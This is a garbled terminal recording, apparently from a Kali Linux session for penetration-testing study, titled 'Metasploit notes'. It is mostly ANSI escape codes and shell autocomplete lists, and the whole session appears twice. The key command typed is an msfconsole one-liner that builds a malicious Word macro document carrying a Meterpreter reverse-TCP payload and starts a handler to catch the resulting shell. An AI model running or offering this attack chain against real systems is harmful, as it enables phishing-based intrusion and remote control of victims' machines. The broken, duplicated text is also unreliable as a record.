Metasploit notes
Script started on 2024-05-02 04:10:49-04:00 [TERM="xterm-256color"
TTY="/dev/pts/7"
COLUMNS="155" LINES="79"]
#[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/CPTS/TerminalLogs##]1;../TerminalLogs##]7;file:///home/kali/CPTS/
TerminalLogs#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mk
ali#[0;34m#[1
m]#[0m#[0m -
#[0m#[0;34m#[1m[#[0m#[1;37m~/CPTS/TerminalLogs#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m790#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m
#[K#[139C[4:10:50]#[148D#[?1h#=#[?
2004hs##[1m#[31ms#[0m#[39m##[1m#[31ms#[0m#[39m#[90mcript --append
Metasploit.txt#[39m#[29D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m
#[104m#[39m#
[49m
#[0;1;2mcommand#[0m
#[0msakis3g samba_downgrade_db samba-log-parser
samba-regedit
samba-tool scanimage scriptlive
sdiff sed see select-default-
wordlist sensortag seq setleds
setmetamode setpriv sha1sum
sha256deep
sha384sum shasum shodan
showconsolefont showkey SIPdump slattach
sleep smbcquotas smbd
smbtar snmpbulkwalk snmpgetnext snmpkey
snmpnetstat snmpstatus snmptest
snmpwalk software-properties-qt spa-json-dump speech-
dispatcher
spiderfoot spiderfoot-cli splitfont
sqlite3 ssh ssh-add sshd
ssh-keygen ssh-keyscan sslh
sslscan sspr2john startplasma-wayland stl2gts
sudoedit sum sumtool
sunrpcfuzz svlc svn svnauthz
svnbench svnsync swapoff
switch_root sync systemd systemd-cgls
systemd-confext systemd-escape systemd-stdio-bridge
#[J#[30m#[104m(MORE)#[39m#[49m#[12A#[0m#[27m#[24m#[0m
#[6C#[1m#[31ms#[0m#[39m#[90mcript --append
Metasploit.txt#[39m#[K#[109C[4:10:50]#[0m#[147D##[1m#[31ms#[1m#[31mu#[0m#[
39m#[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m
#[28D###[0m#[32ms#[0m#[32mu#[39m#[90mdo gedit /etc/hosts#[39m#[19D
#[J#[0;1;2mcommand#[0m
#[J#[0msu #[Jsudo #[Jsudo-command-line #[Jsudoedit #[Jsudo_logsrvd
#[Jsudoreplay #[Jsudo_sendlog #[Jsulogin #[Jsum #[Jsumtool #[Jsunrpcfuzz
#[Jsuperiotool #[Jsuspend #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32msu#[39m#[90mdo gedit
/etc/
hosts#[39m#[K#[118C[4:10:50]#[0m#[146D###[32ms#[32mu#[32md#[39m####[1m#
[31ms#[
1m#[31mu#[1m#[31md#[0m#[39m##[1m#[31md#[1m#[31mo#[0m#[39m#####[0m#[
4m#[32ms#[0m#[4m
#[32mu#[0m#[4m#[32md#[0m#[4m#[32mo#[24m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msudo #[Jsudo-command-line #[Jsudoedit
#[Jsudo_logsrvd #[Jsudoreplay #[Jsudo_sendlog
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m#[90m gedit
/etc/hosts#[39m#[K#[118C[4:10:50]#[0m#[144D##[4m#[32mo#[4m#[32m
#[24m#[39m
#[J#[A#[11C###[4m#[32mo#[24m#[39m#[24m#[39m
#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[J#[0;1;2mexternal command#[0m
#[0mairmon-ng ant atk6-fake_router26 cd-fix-
profile chromeos-tpm-recovery cluster comm
ebtables-save find-debuginfo fsck.vfat gcc-nm
gpic gxl2dot htmove
impacket-keylistattack impacket-sniff kismet
kwalletmanager5
mcafee_epo2john nfsstat oLschema2ldif
orca pfc phar8.2 pipal
pw-mididump r2pm redsocks
sed see seq smbd
snmpgetnext tsk_loaddb uclampset
unshare urlscan valgrind-listener vcstime
x86_64-linux-gnu-ld xfwm4 x-window-manager
#[J#[30m#[104m(MORE)#[39m#[49m#[8A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[90mgedit
/etc/hosts#[39m#[K#[118C[4:10:50]#[0m#[143D#[39mm#[39m #[39m #[39m #[39m
#[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[15D##[1m#[31mm#[0m#[39m#[90msfconsole --execute-command "use
exploit/multi/fileformat/office_word_macro; set payload
windows/meterpreter/reverse_tcp; setg LHOST eth0; run #[90m-#[90m-job; use
exploit/multi/handler; set payload windows/meterpreter/reverse_tcp;
run"#[39m#[K#[A#[71D##[1m#[31mm#[1m#[31ms#[0m#[39m#[1B
#[J#[0;1;2mexternal command#[0m
#[0mmsfconsole msfd msfdb msf-egghunter
msf-
exe2vba msf-exe2vbs msf-find_badchars msf-halflm_second
msf-hmac_sha1_crack msf-java_deserializer msf-jsobfu msf-makeiplist msf-
md5_lookup msf-metasm_shell msf-msf_irb_shell msf-nasm_shell
msf-pattern_create msf-pattern_offset msfpc msf-pdf2xdp
msfrpc
msfrpcd msfupdate msfvenom
msf-virustotal msgattrib msgcat msgcmp
msgcomm
msgconv msgen msgexec
msgfilter msgfmt msggrep msginit
msgmerge
msgunfmt msguniq msldap
#[Jmsldapcompdns #[Jms_print #[Jmsql2mysql
#[Jmsrpcfuzz
#[Jmsrpcfuzz_udp #[Jmsrtool #[Jmsxlint #[J
#[8A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[1m#[31mms#[0m#[39m#[90mfconsole --
execute-command
"use exploit/multi/fileformat/office_word_macro; set payload
windows/meterpreter/reverse_tcp; setg LHOST eth0; run #[90m-#[90m-job; use
exploit/multi/handler; set payload windows/meterpreter/reverse_tcp;
run"#[39m#[K#[0m#[A#[70D##[1m#[31ms#[1m#[31mf#[0m#[39m#[1B
#[J#[0;1;2mexternal command#[0m
#[0mmsfconsole msfd msfdb msf-egghunter
msf-
exe2vba msf-exe2vbs msf-find_badchars msf-halflm_second
msf-hmac_sha1_crack msf-java_deserializer msf-jsobfu msf-makeiplist msf-
md5_lookup msf-metasm_shell msf-msf_irb_shell msf-nasm_shell
msf-pattern_create msf-pattern_offset msfpc msf-pdf2xdp msfrpc
msfrpcd msfupdate msfvenom
#[Jmsf-virustotal #[J
#[6A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[1m#[31mmsf#[0m#[39m#[90mconsole --
execute-command
"use exploit/multi/fileformat/office_word_macro; set payload
windows/meterpreter/reverse_tcp; setg LHOST eth0; run #[90m-#[90m-job; use
exploit/multi/handler; set payload windows/meterpreter/reverse_tcp;
run"#[39m#[K#[0m#[A#[69D##[1m#[31mf#[1m#[31mc#[0m#[39m##[1m#[31mc#[1m
#[31mo#[0m#[39
m#[1B
#[J#[0;1;2mexternal command#[0m
#[J#[0mmsfconsole#[J#[3A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[1m#[31mmsfco#[0m#[39m#[90mnsole --
execute-command
"use exploit/multi/fileformat/office_word_macro; set payload
windows/meterpreter/reverse_tcp; setg LHOST eth0; run #[90m-#[90m-job; use
exploit/multi/handler; set payload windows/meterpreter/reverse_tcp;
run"#[39m#[K#[0m#[A#[67D##[1m#[31mo#[1m#[31mn#[0m#[39m#[1B
#[J#[0;1;2mexternal command#[0m
#[J#[0mmsfconsole#[J#[3A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[1m#[31mmsfcon#[0m#[39m#[90msole --
execute-command
"use exploit/multi/fileformat/office_word_macro; set payload
windows/meterpreter/reverse_tcp; setg LHOST eth0; run #[90m-#[90m-job; use
exploit/multi/handler; set payload windows/meterpreter/reverse_tcp;
run"#[39m#[K#[0m#[A#[66D##[1m#[31mn#[1m#[31ms#[0m#[39m##[1m#[31ms#[1m
#[31mo#[0m#[39
m#[1B
#[J#[0;1;2mexternal command#[0m
#[J#[0mmsfconsole#[J#[3A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[1m#[31mmsfconso#[0m#[39m#[90mle --
execute-command
"use exploit/multi/fileformat/office_word_macro; set payload
windows/meterpreter/reverse_tcp; setg LHOST eth0; run #[90m-#[90m-job; use
exploit/multi/handler; set payload windows/meterpreter/reverse_tcp;
run"#[39m#[K#[0m#[A#[64D##[1m#[31mo#[1m#[31ml#[0m#[39m#[90ml#[90me#[90
m #[90m-
#[90m-#[90me#[90mx#[90me#[90mc#[90mu#[90mt#[90me#[90m-
#[90mc#[90mo#[90mm#[90mm#[90ma#[90mn#[90md#[90m
#[90m"#[90mu#[90ms#[90me#[90m
#[90me#[90mx#[90mp#[90ml#[90mo#[90mi#[90mt#[90m/
#[90mm#[90mu#[90ml#[90mt#[90mi#[90m
/#[90mf#[90mi#[90ml#[90me#[90mf#[90mo#[90mr#[90mm#[90ma#[90mt#[90m/
#[90mo#[90mf#[90mf#[90mi#[90mc#[90me#[90m_#[90mw#[90mo#[90mr#[90md#[9
0m_#[90mm#[90m
a#[90mc#[90mr#[90mo#[90m;#[90m #[90ms#[90me#[90mt#[90m
#[90mp#[90ma#[90my#[90ml#[90mo#[90ma#[90md#[90m
#[90mw#[90mi#[90mn#[90md#[90mo#[90mw#[90ms#[90m/
#[90mm#[90me#[90mt#[90me#[90mr#[90m
p#[90mr#[90me#[90mt#[90me#[90mr#[90m/
#[90mr#[90me#[90mv#[90me#[90mr#[90ms#[90me#[90m_#[90mt#[90mc#[90mp#[9
0m;#[90m
#[90ms#[90me#[90mt#[90mg#[90m #[90mL#[90mH#[90mO#[90mS#[90mT#[90m
#[90me#[90mt#[90mh#[90m0#[90m;#[90m #[90mr#[90mu#[90mn#[90m #[90m-
#[90m-
#[90mj#[90mo#[90mb#[90m;#[90m #[90mu#[90ms#[90me#[90m
#[90me#[90mx#[90mp#[90ml#[90mo#[90mi#[90mt#[90m/
#[90mm#[90mu#[90ml#[90mt#[90mi#[90m
/#[90mh#[90ma#[90mn#[90md#[90ml#[90me#[90mr#[90m;#[90m
#[90ms#[90me#[90mt#[90m
#[90mp#[90ma#[90my#[90ml#[90mo#[90ma#[90md#[90m
Script started on 2024-05-02 04:10:49-04:00 [TERM="xterm-256color"
TTY="/dev/pts/7"
COLUMNS="155" LINES="79"]
#[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/CPTS/TerminalLogs##]1;../TerminalLogs##]7;file:///home/kali/CPTS/
TerminalLogs#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mk
ali#[0;34m#[1
m]#[0m#[0m -
#[0m#[0;34m#[1m[#[0m#[1;37m~/CPTS/TerminalLogs#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m790#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m
#[K#[139C[4:10:50]#[148D#[?1h#=#[?
2004hs##[1m#[31ms#[0m#[39m##[1m#[31ms#[0m#[39m#[90mcript --append
Metasploit.txt#[39m#[29D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m
#[104m#[39m#
[49m
#[0;1;2mcommand#[0m
#[0msakis3g samba_downgrade_db samba-log-parser
samba-regedit
samba-tool scanimage scriptlive
sdiff sed see select-default-
wordlist sensortag seq setleds
setmetamode setpriv sha1sum
sha256deep
sha384sum shasum shodan
showconsolefont showkey SIPdump slattach
sleep smbcquotas smbd
smbtar snmpbulkwalk snmpgetnext snmpkey
snmpnetstat snmpstatus snmptest
snmpwalk software-properties-qt spa-json-dump speech-
dispatcher
spiderfoot spiderfoot-cli splitfont
sqlite3 ssh ssh-add sshd
ssh-keygen ssh-keyscan sslh
sslscan sspr2john startplasma-wayland stl2gts
sudoedit sum sumtool
sunrpcfuzz svlc svn svnauthz
svnbench svnsync swapoff
switch_root sync systemd systemd-cgls
systemd-confext systemd-escape systemd-stdio-bridge
#[J#[30m#[104m(MORE)#[39m#[49m#[12A#[0m#[27m#[24m#[0m
#[6C#[1m#[31ms#[0m#[39m#[90mcript --append
Metasploit.txt#[39m#[K#[109C[4:10:50]#[0m#[147D##[1m#[31ms#[1m#[31mu#[0m#[
39m#[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m
#[28D###[0m#[32ms#[0m#[32mu#[39m#[90mdo gedit /etc/hosts#[39m#[19D
#[J#[0;1;2mcommand#[0m
#[J#[0msu #[Jsudo #[Jsudo-command-line #[Jsudoedit #[Jsudo_logsrvd
#[Jsudoreplay #[Jsudo_sendlog #[Jsulogin #[Jsum #[Jsumtool #[Jsunrpcfuzz
#[Jsuperiotool #[Jsuspend #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32msu#[39m#[90mdo gedit
/etc/
hosts#[39m#[K#[118C[4:10:50]#[0m#[146D###[32ms#[32mu#[32md#[39m####[1m#
[31ms#[
1m#[31mu#[1m#[31md#[0m#[39m##[1m#[31md#[1m#[31mo#[0m#[39m#####[0m#[
4m#[32ms#[0m#[4m
#[32mu#[0m#[4m#[32md#[0m#[4m#[32mo#[24m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msudo #[Jsudo-command-line #[Jsudoedit
#[Jsudo_logsrvd #[Jsudoreplay #[Jsudo_sendlog
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m#[90m gedit
/etc/hosts#[39m#[K#[118C[4:10:50]#[0m#[144D##[4m#[32mo#[4m#[32m
#[24m#[39m
#[J#[A#[11C###[4m#[32mo#[24m#[39m#[24m#[39m
#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[J#[0;1;2mexternal command#[0m
#[0mairmon-ng ant atk6-fake_router26 cd-fix-
profile chromeos-tpm-recovery cluster comm
ebtables-save find-debuginfo fsck.vfat gcc-nm
gpic gxl2dot htmove
impacket-keylistattack impacket-sniff kismet
kwalletmanager5
mcafee_epo2john nfsstat oLschema2ldif
orca pfc phar8.2 pipal
pw-mididump r2pm redsocks
sed see seq smbd
snmpgetnext tsk_loaddb uclampset
unshare urlscan valgrind-listener vcstime
x86_64-linux-gnu-ld xfwm4 x-window-manager
#[J#[30m#[104m(MORE)#[39m#[49m#[8A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[90mgedit
/etc/hosts#[39m#[K#[118C[4:10:50]#[0m#[143D#[39mm#[39m #[39m #[39m #[39m
#[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[15D##[1m#[31mm#[0m#[39m#[90msfconsole --execute-command "use
exploit/multi/fileformat/office_word_macro; set payload
windows/meterpreter/reverse_tcp; setg LHOST eth0; run #[90m-#[90m-job; use
exploit/multi/handler; set payload windows/meterpreter/reverse_tcp;
run"#[39m#[K#[A#[71D##[1m#[31mm#[1m#[31ms#[0m#[39m#[1B
#[J#[0;1;2mexternal command#[0m
#[0mmsfconsole msfd msfdb msf-egghunter
msf-
exe2vba msf-exe2vbs msf-find_badchars msf-halflm_second
msf-hmac_sha1_crack msf-java_deserializer msf-jsobfu msf-makeiplist msf-
md5_lookup msf-metasm_shell msf-msf_irb_shell msf-nasm_shell
msf-pattern_create msf-pattern_offset msfpc msf-pdf2xdp
msfrpc
msfrpcd msfupdate msfvenom
msf-virustotal msgattrib msgcat msgcmp
msgcomm
msgconv msgen msgexec
msgfilter msgfmt msggrep msginit
msgmerge
msgunfmt msguniq msldap
#[Jmsldapcompdns #[Jms_print #[Jmsql2mysql
#[Jmsrpcfuzz
#[Jmsrpcfuzz_udp #[Jmsrtool #[Jmsxlint #[J
#[8A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[1m#[31mms#[0m#[39m#[90mfconsole --
execute-command
"use exploit/multi/fileformat/office_word_macro; set payload
windows/meterpreter/reverse_tcp; setg LHOST eth0; run #[90m-#[90m-job; use
exploit/multi/handler; set payload windows/meterpreter/reverse_tcp;
run"#[39m#[K#[0m#[A#[70D##[1m#[31ms#[1m#[31mf#[0m#[39m#[1B
#[J#[0;1;2mexternal command#[0m
#[0mmsfconsole msfd msfdb msf-egghunter
msf-
exe2vba msf-exe2vbs msf-find_badchars msf-halflm_second
msf-hmac_sha1_crack msf-java_deserializer msf-jsobfu msf-makeiplist msf-
md5_lookup msf-metasm_shell msf-msf_irb_shell msf-nasm_shell
msf-pattern_create msf-pattern_offset msfpc msf-pdf2xdp msfrpc
msfrpcd msfupdate msfvenom
#[Jmsf-virustotal #[J
#[6A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[1m#[31mmsf#[0m#[39m#[90mconsole --
execute-command
"use exploit/multi/fileformat/office_word_macro; set payload
windows/meterpreter/reverse_tcp; setg LHOST eth0; run #[90m-#[90m-job; use
exploit/multi/handler; set payload windows/meterpreter/reverse_tcp;
run"#[39m#[K#[0m#[A#[69D##[1m#[31mf#[1m#[31mc#[0m#[39m##[1m#[31mc#[1m
#[31mo#[0m#[39
m#[1B
#[J#[0;1;2mexternal command#[0m
#[J#[0mmsfconsole#[J#[3A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[1m#[31mmsfco#[0m#[39m#[90mnsole --
execute-command
"use exploit/multi/fileformat/office_word_macro; set payload
windows/meterpreter/reverse_tcp; setg LHOST eth0; run #[90m-#[90m-job; use
exploit/multi/handler; set payload windows/meterpreter/reverse_tcp;
run"#[39m#[K#[0m#[A#[67D##[1m#[31mo#[1m#[31mn#[0m#[39m#[1B
#[J#[0;1;2mexternal command#[0m
#[J#[0mmsfconsole#[J#[3A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[1m#[31mmsfcon#[0m#[39m#[90msole --
execute-command
"use exploit/multi/fileformat/office_word_macro; set payload
windows/meterpreter/reverse_tcp; setg LHOST eth0; run #[90m-#[90m-job; use
exploit/multi/handler; set payload windows/meterpreter/reverse_tcp;
run"#[39m#[K#[0m#[A#[66D##[1m#[31mn#[1m#[31ms#[0m#[39m##[1m#[31ms#[1m
#[31mo#[0m#[39
m#[1B
#[J#[0;1;2mexternal command#[0m
#[J#[0mmsfconsole#[J#[3A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[1m#[31mmsfconso#[0m#[39m#[90mle --
execute-command
"use exploit/multi/fileformat/office_word_macro; set payload
windows/meterpreter/reverse_tcp; setg LHOST eth0; run #[90m-#[90m-job; use
exploit/multi/handler; set payload windows/meterpreter/reverse_tcp;
run"#[39m#[K#[0m#[A#[64D##[1m#[31mo#[1m#[31ml#[0m#[39m#[90ml#[90me#[90
m #[90m-
#[90m-#[90me#[90mx#[90me#[90mc#[90mu#[90mt#[90me#[90m-
#[90mc#[90mo#[90mm#[90mm#[90ma#[90mn#[90md#[90m
#[90m"#[90mu#[90ms#[90me#[90m
#[90me#[90mx#[90mp#[90ml#[90mo#[90mi#[90mt#[90m/
#[90mm#[90mu#[90ml#[90mt#[90mi#[90m
/#[90mf#[90mi#[90ml#[90me#[90mf#[90mo#[90mr#[90mm#[90ma#[90mt#[90m/
#[90mo#[90mf#[90mf#[90mi#[90mc#[90me#[90m_#[90mw#[90mo#[90mr#[90md#[9
0m_#[90mm#[90m
a#[90mc#[90mr#[90mo#[90m;#[90m #[90ms#[90me#[90mt#[90m
#[90mp#[90ma#[90my#[90ml#[90mo#[90ma#[90md#[90m
#[90mw#[90mi#[90mn#[90md#[90mo#[90mw#[90ms#[90m/
#[90mm#[90me#[90mt#[90me#[90mr#[90m
p#[90mr#[90me#[90mt#[90me#[90mr#[90m/
#[90mr#[90me#[90mv#[90me#[90mr#[90ms#[90me#[90m_#[90mt#[90mc#[90mp#[9
0m;#[90m
#[90ms#[90me#[90mt#[90mg#[90m #[90mL#[90mH#[90mO#[90mS#[90mT#[90m
#[90me#[90mt#[90mh#[90m0#[90m;#[90m #[90mr#[90mu#[90mn#[90m #[90m-
#[90m-
#[90mj#[90mo#[90mb#[90m;#[90m #[90mu#[90ms#[90me#[90m
#[90me#[90mx#[90mp#[90ml#[90mo#[90mi#[90mt#[90m/
#[90mm#[90mu#[90ml#[90mt#[90mi#[90m
/#[90mh#[90ma#[90mn#[90md#[90ml#[90me#[90mr#[90m;#[90m
#[90ms#[90me#[90mt#[90m
#[90mp#[90ma#[90my#[90ml#[90mo#[90ma#[90md#[90m